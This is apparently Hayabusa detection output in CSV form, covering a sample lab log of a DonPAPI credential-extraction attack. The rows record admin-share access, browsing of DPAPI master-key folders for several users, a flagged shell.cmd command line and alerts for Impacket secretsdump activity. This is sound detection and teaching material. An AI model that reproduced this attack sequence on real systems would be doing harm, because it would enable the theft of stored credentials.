16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.756 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.817 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8723c99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.829 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:58.454 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x33c | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.709 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.714 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.732 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.800 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
